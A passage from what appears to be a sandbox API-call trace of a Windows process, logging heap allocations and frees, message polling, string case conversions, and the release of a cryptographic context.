lpMsg=0x8bedb8) returned 0 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.773] CryptDestroyKey (hKey=0xaa5760) returned 1 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.773] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.773] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.773] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.774] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.774] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.774] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.774] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.774] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.774] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.775] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.775] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.775] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.775] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.775] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.775] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.775] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.775] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.775] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.776] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.776] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.776] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.776] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.776] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.776] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.777] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.777] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.777] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.777] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.777] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.777] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.777] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.777] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.777] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.777] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.777] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.777] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.778] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.778] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.779] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.779] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.779] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.780] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.780] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.782] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.783] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: 